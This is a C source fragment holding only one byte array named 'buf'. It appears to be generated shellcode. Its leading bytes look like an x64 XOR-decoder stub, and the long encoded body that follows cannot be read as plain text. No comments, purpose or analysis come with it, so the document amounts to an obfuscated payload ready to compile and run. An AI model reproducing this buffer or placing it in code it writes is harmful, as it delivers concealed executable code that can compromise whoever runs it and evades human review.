unsigned char buf[] = 
"\x48\x31\xc9\x48\x81\xe9\x90\xff\xff\xff\x48\x8d\x05\xef"
"\xff\xff\xff\x48\xbb\x28\x73\x31\xcd\x3e\xbc\x49\xb7\x48"
"\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\x57\x36\x7d"
"\x8b\x3c\xbd\x48\xb7\x28\x73\x31\xcd\x3e\xbc\x49\xb7\x29"
"\x73\x0f\xcd\x3f\xbc\x49\xb7\x28\x73\x31\xcd\x3e\xbc\x49"
"\xb7\x28\x73\x31\xcd\x3e\xbc\x49\xb7\x68\x73\x31\xcd\x3e"
"\xbc\x49\xb7\x28\x73\x31\xcd\x7e\xbc\x49\xb7\x28\x73\x71"
"\xcd\x39\xbc\x4a\xb7\x28\x73\x31\xcd\x3e\xbc\x49\xb7\x28"
"\x73\x31\xcd\x3e\xbc\x49\xb7\x28\x73\x31\xcd\x3e\xbc\x49"
"\xb7\x28\x73\x31\xcd\x3e\xbc\x49\xb7\x28\x73\x31\xcd\x3e"
"\xbc\x49\xb7\x28\x73\x31\xcd\x3e\xbc\x49\xb7\x28\x73\x31"
"\xcd\x3e\xbc\x49\xb7\x28\x73\x31\xcd\x3e\xbc\x49\xb7\x29"
"\x73\x31\xcd\x3f\xbc\x49\xb7\x2b\x73\x31\xcd\x3e\xbc\x49"
"\xb7\x28\x73\x31\xcd\x3e\xbc\x49\xb7\x28\x71\x31\xcd\x3e"
"\xbc\x49\xb7\x2d\x73\x31\xcd\x3e\xbc\x49\xb7\x28\x73\x31"
"\xcd\x3e\xbc\x49\xb7\x2c\x73\x31\xcd\x3e\xbc\x49\xb7\x28"
"\x73\x31\xcd\x3e\xbc\x49\xb7\x2f\x73\x31\xcd\x3f\xbc\x49"
"\xb7\x2e\x73\x31\xcd\x3e\xbc\x49\xb7\x28\x73\x31\xcd\x3e"
"\xbc\x49\xb7\x38\x71\x31\xcd\x3e\xbc\x49\xb7\x0f\x73\x31"
"\xcd\x3e\xbc\x49\xb7\x28\x73\x31\xcd\x3e\xbc\x49\xb7\x38"
"\x73\x31\xcd\x3e\xbc\x49\xb7\x28\x73\x31\xcd\x3e\xbc\x49"
"\xb7\x25\x73\x31\xcd\x3d\xbc\x49\xb7\x28\x73\x31\xcd\x3e"
"\xbc\x49\xb7\x28\x73\x31\xcd\x3e\xbc\x49\xb7\x68\x71\x31"
"\xcd\x3e\xbc\x49\xb7\x1a\x73\x31\xcd\x3e\xbc\x49\xb7\x28"
"\x73\x31\xcd\x3e\xbc\x49\xb7\x29\x73\x31\xcd\x3e\xbc\x49"
"\xb7\x28\x73\x31\xcd\x3e\xbc\x49\xb7\x3f\x73\x31\xcd\x3c"
"\xbc\x49\xb7\x28\x73\x31\xcd\x3e\xbc\x49\xb7\x28\x73\x31"
"\xcd\x3e\xbc\x49\xb7\xa8\x71\x31\xcd\x3e\xbc\x49\xb7\x80"
"\x73\x31\xcd\x3e\xbc\x49\xb7\x2d\x73\x31\xcd\x38\xbc\x49"
"\xb7\x20\x73\x31\xcd\x3e\xbc\x49\xb7\x30\x73\x31\xcd\x3e"
"\xbc\x49\xb7\x37\x73\x31\xcd\x3d\xbc\x49\xb7\x28\x73\x31"
"\xcd\x3e\xbc\x49\xb7\x28\x73\x31\xcd\x3e\xbc\x49\xb7\x18"
"\x70\x31\xcd\x3e\xbc\x49\xb7\x09\x73\x31\xcd\x3e\xbc\x49"
"\xb7\x28\x73\x31\xcd\x3e\xbc\x49\xb7\x29\x73\x31\xcd\x3e"
"\xbc\x49\xb7\x28\x73\x31\xcd\x3e\xbc\x49\xb7\x0f\x73\x31"
"\xcd\x3a\xbc\x49\xb7\x28\x73\x31\xcd\x3e\xbc\x49\xb7\x28"
"\x73\x31\xcd\x3e\xbc\x49\xb7\x48\x70\x31\xcd\x3e\xbc\x49"
"\xb7\x30\x73\x31\xcd\x3e\xbc\x49\xb7\x2c\x73\x31\xcd\x3c"
"\xbc\x49\xb7\x20\x73\x31\xcd\x3e\xbc\x49\xb7\x30\x73\x31"
"\xcd\x3e\xbc\x49\xb7\x19\x40\x02\xfa\x3a\xbc\x49\xb7\x28"
"\x73\x31\xcd\x3e\xbc\x49\xb7\x92\x76\x31\xcd\x3e\xf4\xf0"
"\xb7\x28\x73\x31\xcd\x3e\xbc\x49\x0c\x29\x73\x31\xcd\x86"
"\xb8\x49\xb7\x28\xbe\xb1\x75\x3f\xbc\x49\xb7\x93\x73\x31"
"\xcd\x3e\x71\xc9\xb7\x28\x73\x31\xcd\x3e\xbc\x49\xb7\x28"
"\x5d\x55\xac\x4a\xdd\x49\x99\x5c\x16\x49\xb9\x3e\x92\x3a"
"\xdf\x5b\x07\x43\xb9\x5f\xde\x49\x99\x5b\x0a\x5c\xb9\x5f"
"\xde\x49\x99\x5b\x07\x43\xb9\x5f\xde\x49\x99\x5a\x16\x5d"
"\xac\x10\xc8\x2c\xcf\x5c\x73\x31\xcd\x3e\xbc\x49\xb7\x28"
"\x73\x31\xcd\x3e\xbc\x49\xb7\x28\x73\x31\xcd\x3e\xbc\x49"
"\xb7\x28\x73\x31\xcd\x3e\xbc\x49\xb7\x28\x73\x31\xcd\x3e"
"\xbc\x49\xb7\x29\x73\x31\xcd\x3a\xbc\xb8\x48\x28\x73\x31"
"\xcd\x3e\xbc\x49\xb7\x28\x73\x31\xcd\x3e\xbc\x49\xb7\x28"
"\x73\x31\xcd\x3d\xbc\x48\xb7\x28\x73\x31\xcd\x3e\xbc\x49"
"\xb7\x28\x73\x31\xcd\x3e\xbc\x49\xb7\x28\x73\x31\xcd\x3d"
"\xbc\x4b\xb7\x28\x73\x31\xcd\x3e\xbc\x49\xb7\x28\x73\x31"
"\xcd\x3e\xbc\x49\xb7\x3a\x73\x31\xcd\x3e\xbc\x48\xb7\x28"
"\x73\x31\xcd\x3e\xbc\x49\xb7\x28\x73\x31\xcd\x3e\xbc\x49"
"\xb7\x3e\x73\x31\xcd\x3e\xbc\xb8\x48\x2d\x73\x31\xcd\x3e"
"\xbc\x49\xb7\x28\x73\x31\xcd\x3e\xbc\x49\xb7\x32\x73\x31"
"\xcd\x2e\xbc\x4b\xb7\x28\x73\x31\xcd\x3e\xbc\x49\xb7\x28"
"\x73\x31\xcd\x3e\xbc\x49\xb7\x28\x73\x31\xcd\x3e\xbc\x49"
"\xb7\x28\x5d\x1f\xe2\x5f\xcf\x24\x81\x1c\x5c\x50\xbe\x53"
"\x8c\x7b\x99\x5b\x73\x5c\xbe\x59\xbc\x25\xd2\x46\x73\x6e"
"\xbe\x4a\xdd\x3b\xc3\x28\x73\x31\xcd\x3e\xbc\x49\xb7\x28"
"\x73\x31\xcd\x3e\xbc\x49\xb7\x2f\x73\x31\xcd\x3e\xbc\x49"
"\xb7\x29\x73\x31\xcd\x3c\xbc\x49\xb7\x28\x73\x31\xcd\x3e"
"\xbc\x49\xb7\x28\x73\x31\xcd\x3e\xbc\x49\xb7";
